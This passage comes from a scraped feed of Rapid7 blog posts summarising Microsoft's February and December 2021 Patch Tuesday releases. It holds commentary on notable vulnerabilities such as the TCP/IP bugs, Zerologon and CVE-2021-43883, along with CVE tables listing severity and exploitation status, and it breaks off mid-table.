Execution (RCE). [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) is specific to IPv6 link-local addresses, meaning it isn\u2019t exploitable over the public internet. [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>), however, does not have this limitation. The third, [CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>), is a DoS vulnerability that could allow an attacker to trigger a \u201cblue screen of death\u201d on any Windows system that is directly exposed to the internet, using only a small amount of network traffic. The RCE exploits are probably not a threat in the short term, due to the complexity of the vulnerabilities, but DoS attacks are expected to be seen much more quickly. Windows systems should be patched as soon as possible to protect against these.\n\nIn the event a patch cannot be applied immediately, such as on systems that cannot be rebooted, Microsoft has published mitigation guidance that will protect against exploitation of the TCP/IP vulnerabilities. Depending on the exposure of an asset, IPv4 Source Routing should be disabled via a Group Policy or a Netsh command, and IPv6 packet reassembly should be disabled via a separate Netsh command. IPv4 Source Routing requests and IPv6 fragments can also be blocked load balancers, firewalls, or other edge devices to mitigate these issues.\n\n### Zerologon Update\n\nBack in August, 2020, Microsoft addressed a critical remote code vulnerability (CVE-2020-1472) affecting the Netlogon protocol (MS-NRPC), a.k.a. \u201c[Zerologon](<https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>)\u201d. In October, Microsoft [noted](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) that attacks which exploit this weakness have been seen in the wild. On January 14, 2021, they [reminded](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>) organizations that the February 2021 security update bundle will also be enabling \u201cDomain Controller enforcement mode\" by default to fully address this weakness. Any system that tries to make an insecure Netlogon connection will be denied access. Any business-critical process that relies on these insecure connections will cease to function. Rapid7 encourages all organizations to [heed the detailed guidance](<https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73cd1a11e#bkmk_detectingnon_compliant>) before applying the latest updates to ensure continued business process continuity.\n\n### Adobe\n\nMost important amongst the [six security advisories](<https://helpx.adobe.com/security.html>) published by Adobe today is [APSB21-09](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>), detailing 23 CVEs affecting Adobe Acrobat and Reader. Six of these are rated Critical and allow Arbitrary Code Execution, and one of which (CVE-2021-21017), has been seen exploited in the wild in attacks targeting Adobe Reader users on Windows.\n\n### Summary Tables\n\n#### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24109>) | Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-24087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24087>) | Azure IoT CLI extension Elevation of Privilege Vulnerability | No | No | 7 | Yes \n \n#### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24100>) | Microsoft Edge for Android Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-24113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24113>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-21148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21148>) | Chromium CVE-2021-21148: Heap buffer overflow in V8 | N/A | N/A | nan | Yes \n[CVE-2021-21147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21147>) | Chromium CVE-2021-21147: Inappropriate implementation in Skia | N/A | N/A | nan | Yes \n[CVE-2021-21146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21146>) | Chromium CVE-2021-21146: Use after free in Navigation | N/A | N/A | nan | Yes \n[CVE-2021-21145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21145>) | Chromium CVE-2021-21145: Use after free in Fonts | N/A | N/A | nan | Yes \n[CVE-2021-21144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21144>) | Chromium CVE-2021-21144: Heap buffer overflow in Tab Groups | N/A | N/A | nan | Yes \n[CVE-2021-21143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21143>) | Chromium CVE-2021-21143: Heap buffer overflow in Extensions | N/A | N/A | nan | Yes \n[CVE-2021-21142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21142>) | Chromium CVE-2021-21142: Use after free in Payments | N/A | N/A | nan | Yes \n \n#### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-26700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26700>) | Visual Studio Code npm-script Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1639>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7 | No \n[CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) | Sysinternals PsExec Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-24105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24105>) | Package Managers Configurations Remote Code Execution Vulnerability | No | No | 8.4 | Yes \n[CVE-2021-24111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24111>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | Yes | 6.5 | No \n[CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) | .NET Core Remote Code Execution Vulnerability | No | Yes | 8.1 | Yes \n[CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>) | .NET Core Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n \n#### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24080>) | Windows Trust Verification API Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>) | Windows TCP/IP Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1734>) | Windows Remote Procedure Call Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-25195](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-25195>) | Windows PKU2U Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>) | Windows Local Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-24102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24102>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24103>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24083>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n#### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24085>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-1730](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1730>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 5.4 | Yes \n \n#### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1724>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 6.1 | No \n[CVE-2021-24101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24101>) | Microsoft Dataverse Information Disclosure Vulnerability | No | No | 6.5 | Yes \n \n#### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24073>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2021-24099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24099>) | Skype for Business and Lync Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24114>) | Microsoft Teams iOS Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1726>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2021-24072](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24072>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24066>) | Microsoft SharePoint Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24071](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24071>) | Microsoft SharePoint Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-24067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24067>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24068>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24069>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24070>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1728>) | System Center Operations Manager Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24092>) | Microsoft Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n#### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) | Windows Win32k Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-1698](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1698>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24075>) | Windows Network File System Denial of Service Vulnerability | No | No | 6.8 | No \n[CVE-2021-24084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24084>) | Windows Mobile Device Management Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24096>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>) | Windows DirectX Information Disclosure Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>) | Windows Console Driver Denial of Service Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>) | Windows Camera Codec Pack Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24079](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24079>) | Windows Backup Engine Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1731>) | PFX Encryption Security Feature Bypass Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24082>) | Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-24076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24076>) | Microsoft Windows VMSwitch Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>) | Microsoft Windows Codecs Library Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n### Summary Charts\n\n![Patch Tuesday - February 2021](https://blog.rapid7.com/content/images/2021/02/2021-02-vuln_count_component.png)![Patch Tuesday - February 2021](https://blog.rapid7.com/content/images/2021/02/2021-02-cvssv3_hist.png)![Patch Tuesday - February 2021](https://blog.rapid7.com/content/images/2021/02/2021-02-vuln_count_severity.png)![Patch Tuesday - February 2021](https://blog.rapid7.com/content/images/2021/02/2021-02-vuln_count_impact.png)\n\n________Note: _______Chart_______ data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "cvss3": {}, "published": "2021-02-09T23:51:27", "type": "rapid7blog", "title": "Patch Tuesday - February 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2021-1639", "CVE-2021-1698", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1724", "CVE-2021-1726", "CVE-2021-1727", "CVE-2021-1728", "CVE-2021-1730", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-1734", "CVE-2021-21017", "CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-24066", "CVE-2021-24067", "CVE-2021-24068", "CVE-2021-24069", "CVE-2021-24070", "CVE-2021-24071", "CVE-2021-24072", "CVE-2021-24073", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24087", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24092", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24099", "CVE-2021-24100", "CVE-2021-24101", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24105", "CVE-2021-24106", "CVE-2021-24109", "CVE-2021-24111", "CVE-2021-24112", "CVE-2021-24113", "CVE-2021-24114", "CVE-2021-25195", "CVE-2021-26700", "CVE-2021-26701"], "modified": "2021-02-09T23:51:27", "id": "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "href": "https://blog.rapid7.com/2021/02/09/patch-tuesday-february-2021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-22T09:04:02", "description": "![Patch Tuesday - December 2021](https://blog.rapid7.com/content/images/2021/12/patches-2.jpg)\n\nThis month\u2019s Patch Tuesday comes in the middle of a global effort to mitigate [Apache Log4j CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). In today\u2019s security release, Microsoft issued fixes for 83 vulnerabilities across an array of products \u2014 including a fix for Windows Defender for IoT, which is [vulnerable to CVE-2021-44228](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-iot/updated-13-dec-microsoft-defender-for-iot-security-advisory/m-p/3036844>) amongst seven other remote code execution (RCE) vulnerabilities (the cloud service is not affected). Six CVEs in the bulletin have been publicly disclosed; the only vulnerability noted as being exploited in the wild in this month\u2019s release is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), a Windows AppX Installer spoofing bug that may aid in social engineering attacks and has evidently been used in Emotet malware campaigns.\n\nInterestingly, this round of fixes also includes [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a Windows Installer privilege escalation bug whose advisory is sparse despite the fact that it appears to affect all supported versions of Windows. While there\u2019s no indication in the advisory that the two vulnerabilities are related, CVE-2021-43883 looks an awful lot like the fix for [a zero-day vulnerability](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>) that made a splash in the security community last month after proof-of-concept exploit code was released and in-the-wild attacks began. The zero-day vulnerability, which researchers hypothesized was a patch bypass for CVE-2021-41379, allowed low-privileged attackers to overwrite protected files and escalate to SYSTEM. Rapid7\u2019s vulnerability research team did a full [root cause analysis](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=ptblog>) of the bug as attacks ramped up in November.\n\nAs usual, RCE flaws figure prominently in the \u201cCritical\u201d-rated CVEs this month. In addition to Windows Defender for IoT, critical RCE bugs were fixed this month in Microsoft Office, Microsoft Devices, Internet Storage Name Service (iSNS), and the WSL extension for Visual Studio Code. Given the outsized risk presented by most vulnerable implementations of Log4Shell, administrators should prioritize patches for any products affected by CVE-2021-44228. Past that, put critical server-side and OS RCE patches at the top of your list, and we\u2019d advise sneaking in the fix for CVE-2021-43883 despite its lower severity rating. \n\n## Summary charts\n\n![Patch Tuesday - December 2021](https://lh6.googleusercontent.com/iJ4PWxiyEYCgbzRaFbEmnJE783RDrZfby6l9Ld3WCgftcqvRiqMRIMme22umWxTL6-7R33efcphYrbBXU0JKiU8HkN8f7aWB-olpubLyE0kiL8iDqZzx-2jmClFDBG-V6HGPAb5Y)![Patch Tuesday - December 2021](https://blog.rapid7.com/content/images/2021/12/image-3.png)![Patch Tuesday - December 2021](https://blog.rapid7.com/content/images/2021/12/image-4.png)![Patch Tuesday - December 2021](https://blog.rapid7.com/content/images/2021/12/image-5.png)\n\n## Summary tables\n\n### Apps Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43890>) | Windows AppX Installer Spoofing Vulnerability | Yes | Yes | 7.1 | Yes \n[CVE-2021-43905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43905>) | Microsoft Office app Remote Code Execution Vulnerability | No | No | 9.6 | Yes \n \n### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-4068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4068>) | Chromium: CVE-2021-4068 Insufficient validation of untrusted input in new tab page | No | No | N/A | Yes \n[CVE-2021-4067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4067>) | Chromium: CVE-2021-4067 Use after free in window manager | No | No | N/A | Yes \n[CVE-2021-4066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4066>) | Chromium: CVE-2021-4066 Integer underflow in ANGLE | No | No | N/A | Yes \n[CVE-2021-4065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4065>) | Chromium: CVE-2021-4065 Use after free in autofill | No | No | N/A | Yes \n[CVE-2021-4064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4064>) | Chromium: CVE-2021-4064 Use after free in screen capture | No | No | N/A | Yes \n[CVE-2021-4063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4063>) | Chromium: CVE-2021-4063 Use after free in developer tools | No | No | N/A | Yes \n[CVE-2021-4062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4062>) | Chromium: CVE-2021-4062 Heap buffer overflow in BFCache | No | No | N/A | Yes \n[CVE-2021-4061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4061>) | Chromium: CVE-2021-4061 Type Confusion in V8 | No | No | N/A | Yes \n[CVE-2021-4059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4059>) | Chromium: CVE-2021-4059 Insufficient data validation in loader | No | No | N/A | Yes \n[CVE-2021-4058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4058>) | Chromium: CVE-2021-4058 Heap buffer overflow in ANGLE | No | No | N/A | Yes \n[CVE-2021-4057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4057>) | Chromium: CVE-2021-4057 Use after free in file API | No | No | N/A | Yes \n[CVE-2021-4056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4056>) | Chromium: CVE-2021-4056: Type Confusion in loader | No | No | N/A | Yes \n[CVE-2021-4055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4055>) | Chromium: CVE-2021-4055 Heap buffer overflow in extensions | No | No | N/A | Yes \n[CVE-2021-4054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4054>) | Chromium: CVE-2021-4054 Incorrect security UI in autofill | No | No | N/A | Yes \n[CVE-2021-4053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4053>) | Chromium: CVE-2021-4053 Use after free in UI | No | No | N/A | Yes \n[CVE-2021-4052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4052>) | Chromium: CVE-2021-4052 Use after free in web apps | No | No | N/A | Yes \n \n### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43907>) | Visual Studio Code WSL Extension Remote Code Execution Vulnerability | No | No | 9.8 | No \n[CVE-2021-43908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43908>) | Visual Studio Code Spoofing Vulnerability | No | No | nan | No \n[CVE-2021-43891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43891>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43896>) | Microsoft PowerShell Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-43892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43892>) | Microsoft BizTalk ESB Toolkit Spoofing Vulnerability | No | No | 7.4 | No \n[CVE-2021-43225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43225>) | Bot Framework SDK Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-43877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43877>) | ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n### Device Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43899>) | Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n \n### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-42295](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42295>) | Visual Basic for Applications Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-42320](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42320>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2021-43242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43242>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-42309](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42309>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42294>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2021-43255](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43255>) | Microsoft Office Trust Center Spoofing Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43875>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-42293](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42293>) | Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-43256](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43256>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43882>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2021-42311](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42311>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42313](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42313>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42314](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42314>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42315>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes 